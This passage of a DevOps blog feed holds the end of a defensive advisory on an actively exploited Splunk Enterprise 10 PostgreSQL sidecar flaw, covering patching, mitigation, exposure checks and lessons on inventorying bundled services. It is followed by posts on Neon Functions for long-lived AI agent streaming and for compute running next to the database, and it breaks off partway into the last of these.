<div class="post-callout post-callout--warning"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M10.3 3.9 1.8 18a2 2 0 0 0 1.7 3h16.9a2 2 0 0 0 1.7-3L13.7 3.9a2 2 0 0 0-3.4 0z"/><path d="M12 9v4"/><path d="M12 17h.01"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Warning</span><div class="post-callout__body"><p><strong>This is on CISA&#39;s actively-exploited list (KEV), added June 18, 2026 and marked active a day later.</strong> If you run a self-managed Splunk Enterprise 10 deployment, treat this as patch-now, not patch-this-sprint.</p>
</div></div></div><h2 id="h2-who-is-affected" class="group relative scroll-mt-24">
        <a href="#h2-who-is-affected" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Who is affected
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-who-is-affected"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Per the advisory, the affected and fixed versions are:</p>
<ul>
<li><strong>Splunk Enterprise 10.2</strong>, below <strong>10.2.4</strong> (fixed in 10.2.4)</li>
<li><strong>Splunk Enterprise 10.0</strong>, below <strong>10.0.7</strong> (fixed in 10.0.7)</li>
<li><strong>9.4 and earlier are not affected</strong>, because they predate the PostgreSQL sidecar, which is the whole reason the exposure exists in the 10 line and not before.</li>
</ul>
<p>If you run <strong>Splunk Cloud</strong>, Splunk manages that patching; the urgent action is for self-managed Enterprise installs. The vulnerability was published on June 10, 2026 and the exploitation status moved to active by June 19.</p>
<h2 id="h2-what-to-do-now" class="group relative scroll-mt-24">
        <a href="#h2-what-to-do-now" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What to do now
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-to-do-now"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The fix is an upgrade, and there is a real mitigation if you cannot upgrade immediately.</p>
<p><strong>1. Upgrade</strong> to 10.2.4 or 10.0.7 (or later). This is the actual remediation.</p>
<p><strong>2. If you cannot upgrade today, disable the PostgreSQL sidecar service.</strong> The advisory calls this out as the mitigation. You lose the features that depend on it, but you close the hole.</p>
<p><strong>3. Check whether the sidecar is even reachable.</strong> A missing-auth bug only matters if an attacker can reach the port. On each Splunk host, see what is listening and from where:</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># What is listening, and is the Postgres sidecar bound to all interfaces?</span>
<span class="hljs-built_in">sudo</span> ss -tlnp | grep -i postgres
<span class="hljs-comment"># or, more broadly, anything exposed beyond localhost</span>
<span class="hljs-built_in">sudo</span> ss -tlnp | awk <span class="hljs-string">&#x27;$4 !~ /127.0.0.1|::1/&#x27;</span>
</code></pre><p>If that sidecar is bound to <code>0.0.0.0</code> and your Splunk hosts are reachable from anything other than a tightly controlled management network, you are in the exposed group. Firewall it to localhost or a management subnet regardless of patch state.</p>
<p><strong>4. Hunt for the file-write footprint.</strong> Because the primitive is arbitrary file create/truncate as the Splunk user, look for what that leaves behind: recently created or zero-length files under Splunk&#39;s directories and writable paths, unexpected changes to startup or config files, and anomalous processes spawned by the Splunk service account.</p>
<div class="post-callout post-callout--tip"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M9 18h6"/><path d="M10 22h4"/><path d="M15.1 14c.2-1 .7-1.7 1.4-2.5A4.6 4.6 0 0 0 18 8 6 6 0 0 0 6 8c0 1 .2 2.2 1.5 3.5.7.8 1.2 1.5 1.4 2.5"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Tip</span><div class="post-callout__body"><p>Pull this one into your detection content too. A SIEM that can be compromised through an unauthenticated side door is also the tool you would normally use to catch the compromise, so make sure the Splunk host&#39;s own process and file-integrity telemetry is going somewhere the Splunk box does not solely control.</p>
</div></div></div><h2 id="h2-the-part-that-outlives-this-cve" class="group relative scroll-mt-24">
        <a href="#h2-the-part-that-outlives-this-cve" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The part that outlives this CVE
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-part-that-outlives-this-cve"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Patch the bug and the headline is over. The pattern is not.</p>
<p>Modern &quot;appliance&quot; software (SIEMs, observability suites, internal developer platforms, self-hosted SaaS) increasingly ships with helper services baked in. A bundled PostgreSQL for metadata. A Redis for caching. A message broker for events. An embedded object store. These are convenient: the product works out of the box because its dependencies come with it. They are also attack surface you inherited without choosing it, and they have three uncomfortable properties.</p>
<p>They are <strong>invisible</strong>. Nobody filed a ticket to stand up that Postgres, so it is not in your inventory, your CMDB, or your threat model. You cannot defend a service you do not know is running.</p>
<p>They are <strong>on someone else&#39;s patch cadence</strong>. The bundled database is versioned and updated by the vendor, inside the product, on the vendor&#39;s schedule. You do not get to apply a Postgres CVE fix to it directly; you wait for the appliance update. Splunk&#39;s sidecar is exactly this: a database you do not administer, patched only when Splunk ships a new build.</p>
<p>They are <strong>assumed to be internal</strong>, which quietly gets read as &quot;safe.&quot; The sidecar talks to the main process over the loopback or the local network, so it was built as if only trusted callers would ever reach it. Missing authentication looks acceptable right up until the host is multi-homed, the port binds to <code>0.0.0.0</code>, or someone is already on the segment.</p>
<p>So the durable takeaway is an inventory and segmentation habit, not a one-time patch:</p>
<ul>
<li><strong>Inventory what your tools spawn.</strong> For the platforms that matter, actually look: <code>ss -tlnp</code> on the hosts, the container or pod list for the deployment, the process tree under the service account. Write down every helper service and what port it listens on.</li>
<li><strong>Segment internal sidecars by default.</strong> Bind helper services to localhost or a dedicated management network, and firewall them there. &quot;It is only for internal use&quot; should be enforced by the network, not assumed by the code.</li>
<li><strong>Do not equate internal with authenticated.</strong> Treat an unauthenticated internal endpoint as a finding in its own right, before someone else finds it for you.</li>
<li><strong>Watch vendor changelogs for new bundled dependencies.</strong> &quot;Now includes an embedded PostgreSQL&quot; in release notes is a security event, not just a feature. It means your attack surface changed and your inventory is now out of date.</li>
</ul>
<p>CVE-2026-20253 is a clean, fixable bug, and if you run Splunk Enterprise 10 you should go fix it now. But the reason it is worth more than a line in a patch log is that almost every team is running some tool that quietly brought its own database along, and almost nobody has it written down.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Streaming an AI Agent Without a Function Timeout]]></title>
      <link>https://devops-daily.com/posts/neon-functions-streaming-without-timeout</link>
      <description><![CDATA[Long agent loops and long token streams run into the same wall: a serverless function that hits its execution cap and cuts the connection. Neon Functions hold long-lived streaming connections by default. I deployed two endpoints to prove it: one streamed for 90 seconds, the other streamed an agent token by token starting at 466 ms.]]></description>
      <pubDate>Sat, 27 Jun 2026 14:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/neon-functions-streaming-without-timeout</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[neon]]></category><category><![CDATA[serverless]]></category><category><![CDATA[ai-agents]]></category><category><![CDATA[streaming]]></category><category><![CDATA[functions]]></category>
      <content:encoded><![CDATA[<p>An AI agent and a serverless function want different things. The agent wants to think, call a tool, stream some tokens, call another tool, and keep the connection open the whole time, which can be tens of seconds or more. A lot of serverless tiers want the opposite: do your work quickly and return, because the invocation has an execution cap. Put them together and you get the failure everyone who has shipped an agent has seen at least once: the response is still streaming when the platform decides time is up and closes the socket.</p>
<p>This is the second post in our series on <a href="https://neon.com/docs/compute/functions/overview">Neon Functions</a>. The first was about <a href="https://devops-daily.com/posts/neon-functions-compute-on-your-database-branch">where your compute runs relative to your data</a>; this one is about how long it is allowed to keep talking. Neon Functions are built to hold long-lived streaming connections, so a slow agent or a long stream is a normal request, not a fight with a timeout. To show it rather than assert it, I deployed two endpoints and measured them.</p>
<p>(Companion repo, deploy it yourself: <a href="https://github.com/The-DevOps-Daily/neon-streaming-demo">The-DevOps-Daily/neon-streaming-demo</a>.)</p>
<h2 id="h2-two-endpoints-one-config" class="group relative scroll-mt-24">
        <a href="#h2-two-endpoints-one-config" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Two endpoints, one config
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-two-endpoints-one-config"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The whole backend is a single Hono function with the AI Gateway switched on in <code>neon.ts</code>:</p>
<pre><code class="hljs language-ts"><span class="hljs-keyword">import</span> { defineConfig } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;@neondatabase/config/v1&#x27;</span>;

<span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> <span class="hljs-title function_">defineConfig</span>({
  <span class="hljs-attr">preview</span>: {
    <span class="hljs-attr">aiGateway</span>: <span class="hljs-literal">true</span>,
    <span class="hljs-attr">functions</span>: {
      <span class="hljs-attr">stream</span>: { <span class="hljs-attr">name</span>: <span class="hljs-string">&#x27;streaming demo&#x27;</span>, <span class="hljs-attr">source</span>: <span class="hljs-string">&#x27;src/index.ts&#x27;</span> },
    },
  },
});
</code></pre><div class="post-terminal not-prose" data-terminal="{&quot;title&quot;:&quot;deploy the streaming function&quot;,&quot;steps&quot;:[{&quot;cmd&quot;:&quot;neonctl link --project-name streaming --region-id aws-us-east-2&quot;,&quot;output&quot;:&quot;Created project (\&quot;streaming\&quot;) in aws-us-east-2 and linked .neon&quot;},{&quot;cmd&quot;:&quot;neonctl deploy&quot;,&quot;output&quot;:&quot;Applied changes\n  create  service  function:stream\n\nFunction URLs\n  stream: https://br-...-stream.compute.c-3.us-east-2.aws.neon.tech/\n\nUtilized services: Postgres, Functions, AI Gateway\nPulled 7 Neon variables into .env.local&quot;}]}"></div><p>The streaming itself is ordinary Hono. The first endpoint holds a server-sent-events connection open and emits a tick every second, for as many seconds as you ask:</p>
<pre><code class="hljs language-ts"><span class="hljs-keyword">import</span> { streamSSE } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;hono/streaming&#x27;</span>;

app.<span class="hljs-title function_">get</span>(<span class="hljs-string">&#x27;/long-stream&#x27;</span>, <span class="hljs-function">(<span class="hljs-params">c</span>) =&gt;</span> {
  <span class="hljs-keyword">const</span> seconds = <span class="hljs-title class_">Math</span>.<span class="hljs-title function_">min</span>(<span class="hljs-number">600</span>, <span class="hljs-title class_">Math</span>.<span class="hljs-title function_">max</span>(<span class="hljs-number">1</span>, <span class="hljs-title class_">Number</span>(c.<span class="hljs-property">req</span>.<span class="hljs-title function_">query</span>(<span class="hljs-string">&#x27;seconds&#x27;</span>) ?? <span class="hljs-string">&#x27;90&#x27;</span>)));
  <span class="hljs-keyword">const</span> start = <span class="hljs-title class_">Date</span>.<span class="hljs-title function_">now</span>();
  <span class="hljs-keyword">return</span> <span class="hljs-title function_">streamSSE</span>(c, <span class="hljs-title function_">async</span> (stream) =&gt; {
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">let</span> i = <span class="hljs-number">1</span>; i &lt;= seconds; i++) {
      <span class="hljs-keyword">await</span> stream.<span class="hljs-title function_">writeSSE</span>({ <span class="hljs-attr">event</span>: <span class="hljs-string">&#x27;tick&#x27;</span>, <span class="hljs-attr">data</span>: <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">stringify</span>({ <span class="hljs-attr">tick</span>: i, <span class="hljs-attr">elapsed_ms</span>: <span class="hljs-title class_">Date</span>.<span class="hljs-title function_">now</span>() - start }) });
      <span class="hljs-keyword">await</span> stream.<span class="hljs-title function_">sleep</span>(<span class="hljs-number">1000</span>);
    }
    <span class="hljs-keyword">await</span> stream.<span class="hljs-title function_">writeSSE</span>({ <span class="hljs-attr">event</span>: <span class="hljs-string">&#x27;done&#x27;</span>, <span class="hljs-attr">data</span>: <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">stringify</span>({ <span class="hljs-attr">ticks</span>: seconds }) });
  });
});
</code></pre><h2 id="h2-it-streamed-for-90-seconds-without-being-asked-twice" class="group relative scroll-mt-24">
        <a href="#h2-it-streamed-for-90-seconds-without-being-asked-twice" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          It streamed for 90 seconds without being asked twice
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-it-streamed-for-90-seconds-without-being-asked-twice"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>I called <code>/long-stream?seconds=90</code> and let it run. It ticked once a second, on the second, for a minute and a half, and closed cleanly on its own terms:</p>
<div class="post-terminal not-prose" data-terminal="{&quot;title&quot;:&quot;curl -N .../long-stream?seconds=90&quot;,&quot;prompt&quot;:&quot;&gt;&quot;,&quot;steps&quot;:[{&quot;output&quot;:&quot;event: tick   data: {\&quot;tick\&quot;:1,\&quot;elapsed_ms\&quot;:0}&quot;},{&quot;output&quot;:&quot;event: tick   data: {\&quot;tick\&quot;:10,\&quot;elapsed_ms\&quot;:9012}&quot;},{&quot;output&quot;:&quot;event: tick   data: {\&quot;tick\&quot;:30,\&quot;elapsed_ms\&quot;:29034}&quot;},{&quot;output&quot;:&quot;event: tick   data: {\&quot;tick\&quot;:60,\&quot;elapsed_ms\&quot;:59066}&quot;},{&quot;output&quot;:&quot;event: tick   data: {\&quot;tick\&quot;:90,\&quot;elapsed_ms\&quot;:89099}&quot;},{&quot;output&quot;:&quot;event: done   data: {\&quot;ticks\&quot;:90,\&quot;total_ms\&quot;:90099}&quot;}]}"></div><p>Ninety seconds is not a magic number; I picked it because it is comfortably past the execution cap a lot of serverless functions ship with by default, and the function did not care. No special mode, no config flag, no &quot;streaming response&quot; opt-in. The handler just held the connection.</p>
<div class="post-callout post-callout--note"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><circle cx="12" cy="12" r="10"/><path d="M12 16v-4"/><path d="M12 8h.01"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Note</span><div class="post-callout__body"><p>To be precise about the comparison: this is about defaults and design, not &quot;infinite versus finite.&quot; Traditional serverless functions cap a single invocation low by default (Vercel&#39;s Hobby tier at 10 seconds, Pro at 60), which is exactly where a slow agent gets cut off. Platforms do offer longer runs when you reach for them: Vercel&#39;s Fluid Compute extends to 300 to 1800 seconds, and AWS Lambda allows up to 15 minutes. The point is that long-lived streaming is the default behaviour of a Neon Function, not a setting you discover after your agent times out in production.</p>
</div></div></div><h2 id="h2-now-stream-an-actual-agent" class="group relative scroll-mt-24">
        <a href="#h2-now-stream-an-actual-agent" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Now stream an actual agent
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-now-stream-an-actual-agent"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>A ticking clock proves the connection lasts. The real workload is a model streaming tokens. The second endpoint sends the prompt to the <a href="https://neon.com/docs/ai-gateway/overview">Neon AI Gateway</a> with <code>stream: true</code> and relays each token to the caller as it arrives:</p>
<pre><code class="hljs language-ts"><span class="hljs-keyword">const</span> upstream = <span class="hljs-keyword">await</span> <span class="hljs-title function_">fetch</span>(<span class="hljs-string">`<span class="hljs-subst">${process.env.NEON_AI_GATEWAY_BASE_URL}</span>/ai-gateway/mlflow/v1/chat/completions`</span>, {
  <span class="hljs-attr">method</span>: <span class="hljs-string">&#x27;POST&#x27;</span>,
  <span class="hljs-attr">headers</span>: { <span class="hljs-title class_">Authorization</span>: <span class="hljs-string">`Bearer <span class="hljs-subst">${process.env.NEON_AI_GATEWAY_TOKEN}</span>`</span>, <span class="hljs-string">&#x27;content-type&#x27;</span>: <span class="hljs-string">&#x27;application/json&#x27;</span> },
  <span class="hljs-attr">body</span>: <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">stringify</span>({ <span class="hljs-attr">model</span>: <span class="hljs-string">&#x27;gpt-5-nano&#x27;</span>, <span class="hljs-attr">stream</span>: <span class="hljs-literal">true</span>, messages }),
});
<span class="hljs-comment">// ...parse the upstream SSE and re-emit each delta as it lands</span>
<span class="hljs-keyword">await</span> stream.<span class="hljs-title function_">writeSSE</span>({ <span class="hljs-attr">event</span>: <span class="hljs-string">&#x27;token&#x27;</span>, <span class="hljs-attr">data</span>: <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">stringify</span>({ delta }) });
</code></pre><p>Calling it with a small prompt, the first token came back at <strong>466 ms</strong> and the full 62-token reply finished at about <strong>2.0 seconds</strong>. The reader sees the answer forming almost immediately instead of waiting two seconds for a wall of text:</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Streaming vs waiting: when you see the agent's reply&quot;,&quot;unit&quot;:&quot;s&quot;,&quot;caption&quot;:&quot;POST /agent, gpt-5-nano through the Neon AI Gateway, 62 tokens. Streaming means the first token lands at ~0.47s; without streaming the reader waits for the whole ~2.0s reply. The gap grows with longer answers and multi-step agents.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;First token visible (streaming)&quot;,&quot;value&quot;:0.47},{&quot;label&quot;:&quot;Whole reply (no streaming)&quot;,&quot;value&quot;:2}]}"></div><p>Two seconds is short because the model and the prompt are small. The reason this matters is that real agents are not short: they make several model calls, run tools between them, and a full run is routinely tens of seconds. On a platform that caps invocations at 10 or 60 seconds, that run is a gamble against the clock. On a function built to hold the stream, it is just a request that takes a while.</p>
<h2 id="h2-what-it-is-and-what-it-is-not" class="group relative scroll-mt-24">
        <a href="#h2-what-it-is-and-what-it-is-not" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What it is, and what it is not
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-it-is-and-what-it-is-not"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><div class="post-callout post-callout--warning"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M10.3 3.9 1.8 18a2 2 0 0 0 1.7 3h16.9a2 2 0 0 0 1.7-3L13.7 3.9a2 2 0 0 0-3.4 0z"/><path d="M12 9v4"/><path d="M12 17h.01"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Warning</span><div class="post-callout__body"><p><strong>Private preview, one region, new projects only.</strong> Everything is in AWS <code>us-east-2</code> and only works on projects created inside the preview. Plan accordingly before building on it.</p>
</div></div></div><p>Two more things worth knowing before you reach for this:</p>
<ul>
<li><strong>It is request/response, even when the response is long.</strong> These functions answer a caller and can keep streaming to it for a long time, including over WebSockets and SSE. They are not a background job runner. Work that should outlive the request (queues, retries, scheduled tasks) belongs to something like Inngest or QStash.</li>
<li><strong>Idle functions can be evicted.</strong> A long <em>active</em> stream is fine; a function sitting idle may be scaled to zero and cold-start on the next call. That is the usual serverless tradeoff, not a streaming-specific one.</li>
</ul>
<h2 id="h2-who-this-is-for" class="group relative scroll-mt-24">
        <a href="#h2-who-this-is-for" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Who this is for
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-who-this-is-for"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>If you are shipping anything agentic (a chat assistant, a tool-using agent, a long generation, an MCP server holding a session), the timeout is the wall you hit first, and the usual workaround is to learn your platform&#39;s extended-duration mode and hope you configured it right. A function that holds the stream by default removes that whole category of &quot;why did my response get cut off&quot; debugging.</p>
<p>The full demo, both endpoints, is here. The streaming logic is about 80 lines:</p>
<div class="post-github not-prose" data-repo="The-DevOps-Daily/neon-streaming-demo"></div><p>Next in the series: a Postgres-backed MCP server in about twenty lines, and preview environments that include the backend, not just the frontend. The strategy behind all of it is in <a href="https://devops-daily.com/posts/neon-backend-platform-not-just-postgres">Neon is becoming a backend platform, not just Postgres</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Compute That Lives on Your Database Branch]]></title>
      <link>https://devops-daily.com/posts/neon-functions-compute-on-your-database-branch</link>
      <description><![CDATA[Neon Functions run your code in the same region as your Postgres, on a per-branch URL. To see why that matters I deployed a small API and timed a query from inside the function versus from a machine across the Atlantic: 1.2 ms against 135 ms. Here is how it works, with the real numbers and the repo.]]></description>
      <pubDate>Sat, 27 Jun 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/neon-functions-compute-on-your-database-branch</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[neon]]></category><category><![CDATA[serverless]]></category><category><![CDATA[postgres]]></category><category><![CDATA[functions]]></category><category><![CDATA[platform-engineering]]></category>
      <content:encoded><![CDATA[<p>Ask where your backend code runs relative to your database and the answer is often &quot;somewhere else.&quot; Your function is in one provider&#39;s <code>us-east-1</code>, your Postgres is in another region entirely, and every query crosses that gap. Most of the time you don&#39;t see it, because one query is fast enough to ignore. Then a request makes eight queries in sequence, each pays the round trip, and suddenly an endpoint that should take milliseconds takes most of a second.</p>
<p><a href="https://neon.com/docs/compute/functions/overview">Neon Functions</a>, part of Neon&#39;s June 2026 platform preview, takes a different position: run the compute in the same region as the database branch, on a URL scoped to that branch. This is the first in a series on what that buys you. It is also the simplest to demonstrate, because the benefit is something you can measure. I deployed a small REST API and timed a trivial query two ways. The numbers are at the bottom, and they are not close.</p>
<p>(Companion repo, deploy it yourself: <a href="https://github.com/The-DevOps-Daily/neon-functions-demo">The-DevOps-Daily/neon-functions-demo</a>.)</p>
<h2 id="h2-the-whole-backend-is-one-config-file" class="group relative scroll-mt-24">
        <a href="#h2-the-whole-backend-is-one-config-file" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The whole backend is one config file
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-whole-backend-is-one-config-file"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Neon ships starter templates through its CLI. The REST API is one of them:</p>
<div class="post-terminal not-prose" data-terminal="{&quot;title&quot;:&quot;scaffold + deploy&quot;,&quot;steps&quot;:[{&quot;comment&quot;:&quot;scaffold a Hono + Drizzle REST API&quot;},{&quot;cmd&quot;:&quot;neonctl bootstrap ./api --template hono&quot;,&quot;output&quot;:&quot;Scaffolded 23 files into ./api&quot;},{&quot;comment&quot;:&quot;create a project (us-east-2, preview only) and deploy&quot;},{&quot;cmd&quot;:&quot;neonctl link --project-name api --region-id aws-us-east-2&quot;,&quot;output&quot;:&quot;Created project (\&quot;api\&quot;) in aws-us-east-2 and linked .neon on branch main&quot;},{&quot;cmd&quot;:&quot;neonctl deploy&quot;,&quot;output&quot;:&quot;Applied changes\n  create  service  function:todos\n\nFunction URLs\n  todos: https://br-restless-sound-...-todos.compute.c-3.us-east-2.aws.neon.tech/\n\nUtilized services: Postgres, Functions&quot;}]}"></div><p>What gets deployed is declared in <code>neon.ts</code>. For this API it is three lines of intent: take <code>src/index.ts</code> and run it as a function called <code>todos</code>.</p>
<pre><code class="hljs language-ts"><span class="hljs-keyword">import</span> { defineConfig } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;@neondatabase/config/v1&#x27;</span>;

<span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> <span class="hljs-title function_">defineConfig</span>({
  <span class="hljs-attr">preview</span>: {
    <span class="hljs-attr">functions</span>: {
      <span class="hljs-attr">todos</span>: { <span class="hljs-attr">name</span>: <span class="hljs-string">&#x27;todo api&#x27;</span>, <span class="hljs-attr">source</span>: <span class="hljs-string">&#x27;src/index.ts&#x27;</span> },
    },
  },
});
</code></pre><p>No connection string in there, no region to pick for the compute, no URL to reserve. The <code>DATABASE_URL</code> is injected at deploy time, and the function lands in the same region as the branch automatically.</p>
<h2 id="h2-the-function-is-a-normal-web-handler" class="group relative scroll-mt-24">
        <a href="#h2-the-function-is-a-normal-web-handler" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The function is a normal web handler
        </a>
        <button 
